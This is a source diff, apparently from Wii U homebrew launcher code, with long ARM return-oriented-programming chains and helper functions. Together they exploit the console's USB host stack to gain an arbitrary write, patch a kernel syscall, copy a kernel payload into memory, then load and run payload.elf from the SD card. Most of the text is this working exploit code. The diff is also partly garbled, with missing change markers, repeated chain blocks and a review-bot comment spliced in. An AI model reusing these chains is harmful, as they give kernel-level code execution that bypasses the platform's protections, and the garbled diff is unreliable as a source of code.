0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(ios_kernel_bin), // 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x00140000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x0,
0x0,
0x101312D0,
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
|
||||
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A04000, // 0x80 value: MOV R4, R0
|
||||
0x0, // 0x84
|
||||
0x10123a8b, // 0x88 POP {R3,R4,PC}
|
||||
0x1, // 0x8C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x90
|
||||
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0xA4
|
||||
0x0, // 0xA8
|
||||
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
|
||||
0x0, // 0xB8
|
||||
0x10123a8b, // 0xBC POP {R3,R4,PC}
|
||||
0x1, // 0xC0 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0xC4
|
||||
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0xCC
|
||||
0x0, // 0xD0
|
||||
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0xD8
|
||||
0x0, // 0xDC
|
||||
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
|
||||
0x0, // 0xEC
|
||||
0x10123a8b, // 0xF0 POP {R3,R4,PC}
|
||||
0x1, // 0xF4 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0xF8
|
||||
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x100
|
||||
0x0, // 0x104
|
||||
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x10C
|
||||
0x0, // 0x110
|
||||
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A00004, // 0x11C value: MOV R0, R4
|
||||
0x0, // 0x120
|
||||
0x10123a8b, // 0x124 POP {R3,R4,PC}
|
||||
0x1, // 0x128 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x12C
|
||||
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x134
|
||||
0x0, // 0x138
|
||||
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x140
|
||||
0x0, // 0x144
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0x00000000, // 0x150 value: NOP
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0x1AFFFFFD, // 0x150 value: BNE clean_loop
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
|
||||
0x0, // 0x154
|
||||
0x10123a8b, // 0x158 POP {R3,R4,PC}
|
||||
0x1, // 0x15C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x160
|
||||
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x168
|
||||
0x0, // 0x16C
|
||||
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x174
|
||||
0x0, // 0x178
|
||||
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A03004, // 0x184 value: MOV R3, R4
|
||||
0x0, // 0x188
|
||||
0x10123a8b, // 0x18C POP {R3,R4,PC}
|
||||
0x1, // 0x190 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x194
|
||||
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x19C
|
||||
0x0, // 0x1A0
|
||||
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1A8
|
||||
0x0, // 0x1AC
|
||||
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE8BD4010, // 0x184 value: POP {R4,LR}
|
||||
0x0, // 0x188
|
||||
0x10123a8b, // 0x18C POP {R3,R4,PC}
|
||||
0x1, // 0x190 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x194
|
||||
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x19C
|
||||
0x0, // 0x1A0
|
||||
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1A8
|
||||
0x0, // 0x1AC
|
||||
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
|
||||
0x0, // 0x1BC
|
||||
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
|
||||
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x1C8
|
||||
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x1D0
|
||||
0x0, // 0x1D4
|
||||
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x1DC
|
||||
0x0, // 0x1E0
|
||||
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
|
||||
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
|
||||
0x0, // 0x1E0
|
||||
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
|
||||
0x0, // 0x1DC
|
||||
0x0, // 0x1E0
|
||||
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
|
||||
ARM_CODE_BASE, // 0x1E8 our code destination address
|
||||
0x0, // 0x1EC
|
||||
0x0, // 0x1F0
|
||||
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x1F8
|
||||
sizeof(ios_kernel_bin), // 0x1FC our code size
|
||||
0x0, // 0x200
|
||||
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
|
||||
0x00140000, // 0x208 our code source location
|
||||
0x08131D04, // 0x20C KERNEL_MEMCPY address
|
||||
0x0, // 0x210
|
||||
0x0, // 0x214
|
||||
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
|
||||
0x0,
|
||||
0x0,
|
||||
0x101312D0,
|
||||
};
|
||||
|
||||
static const int second_chain[] = {
|
||||
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
|
||||
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
|
||||
0x0, // 0x08
|
||||
0x0, // 0x0C
|
||||
0x101063db, // 0x10 POP {R1,R2,R5,PC}
|
||||
0x00130000, // 0x14 source
|
||||
sizeof(final_chain), // 0x18 length
|
||||
0x0, // 0x1C
|
||||
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x24
|
||||
0x0, // 0x28
|
||||
0x101236f3, // 0x2C POP {R1-R7,PC}
|
||||
0x0, // 0x30 arg
|
||||
0x101001DC, // 0x34 stackptr
|
||||
0x68, // 0x38 stacksize
|
||||
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x40
|
||||
0x0, // 0x44
|
||||
0x0, // 0x48
|
||||
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x50
|
||||
0x0, // 0x54
|
||||
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x5C
|
||||
0x0, // 0x60
|
||||
IOS_CREATETHREAD, // 0x64
|
||||
0x1, // 0x68 priority
|
||||
0x2, // 0x6C flags
|
||||
0x0, // 0x70
|
||||
0x0, // 0x74
|
||||
0x101063db, // 0x78 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x7C
|
||||
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
|
||||
0x0, // 0x84
|
||||
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x0,
|
||||
0x00110000 - 0x44, // 0x8C
|
||||
0x00110010, // 0x90
|
||||
0x0, // 0x94
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x0, // 0xA0
|
||||
0x0, // 0xA4
|
||||
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
|
||||
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x1012EA68, // 0xAC stack pivot
|
||||
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
|
||||
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
|
||||
0x0, // 0x08
|
||||
0x0, // 0x0C
|
||||
0x101063db, // 0x10 POP {R1,R2,R5,PC}
|
||||
0x00130000, // 0x14 source
|
||||
sizeof(final_chain), // 0x18 length
|
||||
0x0, // 0x1C
|
||||
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x24
|
||||
0x0, // 0x28
|
||||
0x101236f3, // 0x2C POP {R1-R7,PC}
|
||||
0x0, // 0x30 arg
|
||||
0x101001DC, // 0x34 stackptr
|
||||
0x68, // 0x38 stacksize
|
||||
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x40
|
||||
0x0, // 0x44
|
||||
0x0, // 0x48
|
||||
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x50
|
||||
0x0, // 0x54
|
||||
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x5C
|
||||
0x0, // 0x60
|
||||
IOS_CREATETHREAD, // 0x64
|
||||
0x1, // 0x68 priority
|
||||
0x2, // 0x6C flags
|
||||
0x0, // 0x70
|
||||
0x0, // 0x74
|
||||
0x101063db, // 0x78 POP {R1,R2,R5,PC}
|
||||
0x0, // 0x7C
|
||||
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
|
||||
0x0, // 0x84
|
||||
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x0,
|
||||
0x00110000 - 0x44, // 0x8C
|
||||
0x00110010, // 0x90
|
||||
0x0, // 0x94
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x0, // 0xA0
|
||||
0x0, // 0xA4
|
||||
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
|
||||
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
|
||||
0x0,
|
||||
0x0,
|
||||
0x1012EA68, // 0xAC stack pivot
|
||||
};
|
||||
|
||||
static void uhs_exploit_init(int dev_uhs_0_handle) {
|
||||
ayylmao[5] = 1;
|
||||
ayylmao[8] = 0x500000;
|
||||
|
||||
memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
|
||||
memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
|
||||
memcpy((char*)(0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin));
|
||||
memcpy((char *) (0xF4120000), second_chain, sizeof(second_chain));
|
||||
memcpy((char *) (0xF4130000), final_chain, sizeof(final_chain));
|
||||
memcpy((char *) (0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin));
|
||||
|
||||
payload_info_t *payloads = (payload_info_t*)0xF4148000;
|
||||
payload_info_t *payloads = (payload_info_t *) 0xF4148000;
|
||||
payloads->size = sizeof(ios_usb_bin);
|
||||
memcpy(payloads->data, ios_usb_bin, payloads->size);
|
||||
|
||||
@ -319,24 +320,24 @@ static void uhs_exploit_init(int dev_uhs_0_handle) {
|
||||
pretend_root_hub[78] = 0;
|
||||
|
||||
DCStoreRange(pretend_root_hub + 33, 200);
|
||||
DCStoreRange((void*)0xF4120000, sizeof(second_chain));
|
||||
DCStoreRange((void*)0xF4130000, sizeof(final_chain));
|
||||
DCStoreRange((void*)0xF4140000, sizeof(ios_kernel_bin));
|
||||
DCStoreRange((void*)0xF4148000, ((uint32_t)0xF4180000) - 0xF4148000);
|
||||
DCStoreRange((void *) 0xF4120000, sizeof(second_chain));
|
||||
DCStoreRange((void *) 0xF4130000, sizeof(final_chain));
|
||||
DCStoreRange((void *) 0xF4140000, sizeof(ios_kernel_bin));
|
||||
DCStoreRange((void *) 0xF4148000, ((uint32_t) 0xF4180000) - 0xF4148000);
|
||||
}
|
||||
|
||||
static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) {
|
||||
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
|
||||
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
|
||||
OSSleepTicks(0x200000); //! Improves stability
|
||||
int request_buffer[] = { -(0xBEA2C), val }; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
|
||||
int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
|
||||
int output_buffer[32];
|
||||
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
|
||||
}
|
||||
|
||||
int ExecuteIOSExploit() {
|
||||
int iosuhaxFd = IOS_Open("/dev/iosuhax", 0);
|
||||
if(iosuhaxFd >= 0) {
|
||||
if (iosuhaxFd >= 0) {
|
||||
int dummy = 0;
|
||||
|
||||
IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
|
||||
@ -349,7 +350,7 @@ int ExecuteIOSExploit() {
|
||||
|
||||
//! execute exploit
|
||||
int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);
|
||||
if(dev_uhs_0_handle < 0) {
|
||||
if (dev_uhs_0_handle < 0) {
|
||||
return dev_uhs_0_handle;
|
||||
}
|
||||
|
||||
|
@ -27,6 +27,7 @@
|
||||
#include "ios_exploit.h"
|
||||
|
||||
#include "gx2sploit.h"
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
@ -37,20 +38,20 @@ extern "C" {
|
||||
|
||||
bool CheckRunning() {
|
||||
|
||||
switch(ProcUIProcessMessages(true)) {
|
||||
case PROCUI_STATUS_EXITING: {
|
||||
return false;
|
||||
}
|
||||
case PROCUI_STATUS_RELEASE_FOREGROUND: {
|
||||
ProcUIDrawDoneRelease();
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_FOREGROUND: {
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_BACKGROUND:
|
||||
default:
|
||||
break;
|
||||
switch (ProcUIProcessMessages(true)) {
|
||||
case PROCUI_STATUS_EXITING: {
|
||||
return false;
|
||||
}
|
||||
case PROCUI_STATUS_RELEASE_FOREGROUND: {
|
||||
ProcUIDrawDoneRelease();
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_FOREGROUND: {
|
||||
break;
|
||||
}
|
||||
case PROCUI_STATUS_IN_BACKGROUND:
|
||||
default:
|
||||
break;
|
||||
}
|
||||
return true;
|
||||
}
|
||||
@ -69,29 +70,29 @@ int main(int argc, char **argv) {
|
||||
uint32_t btn = vpad_data.hold | vpad_data.trigger;
|
||||
bool loadWithoutHacks = false;
|
||||
bool kernelDone = false;
|
||||
if((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) {
|
||||
if ((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) {
|
||||
loadWithoutHacks = true;
|
||||
}
|
||||
if((btn & VPAD_BUTTON_ZL) == VPAD_BUTTON_ZL) {
|
||||
if ((btn & VPAD_BUTTON_ZL) == VPAD_BUTTON_ZL) {
|
||||
// In case that fopen check is not working...
|
||||
WHBLogPrintf("Force kernel exploit");
|
||||
kernelDone = true;
|
||||
DoKernelExploit();
|
||||
}
|
||||
|
||||
if(!kernelDone) {
|
||||
if(fopen("fs:/vol/external01/wiiu/payload.elf", "r") != NULL) {
|
||||
if (!kernelDone) {
|
||||
if (fopen("fs:/vol/external01/wiiu/payload.elf", "r") != NULL) {
|
||||
WHBLogPrintf("We need the kernel exploit to load the payload");
|
||||
DoKernelExploit();
|
||||
}
|
||||
}
|
||||
|
||||
if(!loadWithoutHacks) {
|
||||
if (!loadWithoutHacks) {
|
||||
uint32_t entryPoint = load_loader_elf_from_sd(0, "wiiu/payload.elf");
|
||||
if(entryPoint != 0) {
|
||||
if (entryPoint != 0) {
|
||||
WHBLogPrintf("New entrypoint: %08X", entryPoint);
|
||||
int res = ((int (*)(int, char **))entryPoint)(argc, argv);
|
||||
if(res > 0) {
|
||||
int res = ((int (*)(int, char **)) entryPoint)(argc, argv);
|
||||
if (res > 0) {
|
||||
WHBLogPrintf("Returning...");
|
||||
WHBLogUdpDeinit();
|
||||
return 0;
|
||||
@ -103,20 +104,20 @@ int main(int argc, char **argv) {
|
||||
ProcUIInit(OSSavesDone_ReadyToRelease);
|
||||
DEBUG_FUNCTION_LINE("ProcUIInit done");
|
||||
|
||||
if(loadWithoutHacks) {
|
||||
if (loadWithoutHacks) {
|
||||
DEBUG_FUNCTION_LINE("Load system menu");
|
||||
// Restore the default title id to the normal wii u menu.
|
||||
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0);
|
||||
memcpy((void*)0xF417FFF0, &sysmenuIdUll, 8);
|
||||
DCStoreRange((void*)0xF417FFF0,0x8);
|
||||
memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8);
|
||||
DCStoreRange((void *) 0xF417FFF0, 0x8);
|
||||
|
||||
DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n",sysmenuIdUll);
|
||||
DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll);
|
||||
|
||||
ExecuteIOSExploit();
|
||||
SYSLaunchMenu();
|
||||
}
|
||||
|
||||
while(CheckRunning()) {
|
||||
while (CheckRunning()) {
|
||||
// wait.
|
||||
OSSleepTicks(OSMillisecondsToTicks(100));
|
||||
}
|
||||
|
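Review bot: The `FILE *` returned by `fopen("fs:/vol/external01/wiiu/payload.elf", "r")` in the `if (!kernelDone)` block is only compared against NULL and never closed, so every successful probe leaks a stream handle before the payload is loaded. A minimal fix keeps the handle and releases it: `FILE *probe = fopen("fs:/vol/external01/wiiu/payload.elf", "r"); if (probe != NULL) { fclose(probe); WHBLogPrintf("We need the kernel exploit to load the payload"); DoKernelExploit(); }`. The probe and the later `load_loader_elf_from_sd(0, "wiiu/payload.elf")` spell the path differently (mount prefix vs. SD-relative), which is presumably intentional but deserves a one-line comment so the two are not "fixed" to match. main() starts before and ends after these hunks.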
@ -36,13 +36,13 @@
|
||||
#include <utils/StringTools.h>
|
||||
|
||||
|
||||
BOOL StringTools::EndsWith(const std::string& a, const std::string& b) {
|
||||
BOOL StringTools::EndsWith(const std::string &a, const std::string &b) {
|
||||
if (b.size() > a.size())
|
||||
return false;
|
||||
return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin());
|
||||
}
|
||||
|
||||
const char * StringTools::byte_to_binary(int32_t x) {
|
||||
const char *StringTools::byte_to_binary(int32_t x) {
|
||||
static char b[9];
|
||||
b[0] = '\0';
|
||||
|
||||
@ -54,25 +54,25 @@ const char * StringTools::byte_to_binary(int32_t x) {
|
||||
return b;
|
||||
}
|
||||
|
||||
std::string StringTools::removeCharFromString(std::string& input,char toBeRemoved) {
|
||||
std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) {
|
||||
std::string output = input;
|
||||
size_t position;
|
||||
while(1) {
|
||||
while (1) {
|
||||
position = output.find(toBeRemoved);
|
||||
if(position == std::string::npos)
|
||||
if (position == std::string::npos)
|
||||
break;
|
||||
output.erase(position, 1);
|
||||
}
|
||||
return output;
|
||||
}
|
||||
|
||||
const char * StringTools::fmt(const char * format, ...) {
|
||||
const char *StringTools::fmt(const char *format, ...) {
|
||||
static char strChar[512];
|
||||
strChar[0] = 0;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(strChar, format, va) >= 0)) {
|
||||
if ((vsprintf(strChar, format, va) >= 0)) {
|
||||
va_end(va);
|
||||
return (const char *) strChar;
|
||||
}
|
||||
@ -81,26 +81,26 @@ const char * StringTools::fmt(const char * format, ...) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
const wchar_t * StringTools::wfmt(const char * format, ...) {
|
||||
const wchar_t *StringTools::wfmt(const char *format, ...) {
|
||||
static char tmp[512];
|
||||
static wchar_t strWChar[512];
|
||||
strWChar[0] = 0;
|
||||
tmp[0] = 0;
|
||||
|
||||
if(!format)
|
||||
if (!format)
|
||||
return (const wchar_t *) strWChar;
|
||||
|
||||
if(strcmp(format, "") == 0)
|
||||
if (strcmp(format, "") == 0)
|
||||
return (const wchar_t *) strWChar;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(tmp, format, va) >= 0)) {
|
||||
int bt;
|
||||
if ((vsprintf(tmp, format, va) >= 0)) {
|
||||
int bt;
|
||||
int32_t strlength = strlen(tmp);
|
||||
bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512 );
|
||||
bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512);
|
||||
|
||||
if(bt > 0) {
|
||||
if (bt > 0) {
|
||||
strWChar[bt] = 0;
|
||||
return (const wchar_t *) strWChar;
|
||||
}
|
||||
@ -110,14 +110,14 @@ const wchar_t * StringTools::wfmt(const char * format, ...) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
int32_t StringTools::strprintf(std::string &str, const char * format, ...) {
|
||||
int32_t StringTools::strprintf(std::string &str, const char *format, ...) {
|
||||
static char tmp[512];
|
||||
tmp[0] = 0;
|
||||
int32_t result = 0;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(tmp, format, va) >= 0)) {
|
||||
if ((vsprintf(tmp, format, va) >= 0)) {
|
||||
str = tmp;
|
||||
result = str.size();
|
||||
}
|
||||
@ -126,14 +126,14 @@ int32_t StringTools::strprintf(std::string &str, const char * format, ...) {
|
||||
return result;
|
||||
}
|
||||
|
||||
std::string StringTools::strfmt(const char * format, ...) {
|
||||
std::string StringTools::strfmt(const char *format, ...) {
|
||||
std::string str;
|
||||
static char tmp[512];
|
||||
tmp[0] = 0;
|
||||
|
||||
va_list va;
|
||||
va_start(va, format);
|
||||
if((vsprintf(tmp, format, va) >= 0)) {
|
||||
if ((vsprintf(tmp, format, va) >= 0)) {
|
||||
str = tmp;
|
||||
}
|
||||
va_end(va);
|
||||
@ -141,11 +141,11 @@ std::string StringTools::strfmt(const char * format, ...) {
|
||||
return str;
|
||||
}
|
||||
|
||||
BOOL StringTools::char2wchar_t(const char * strChar, wchar_t * dest) {
|
||||
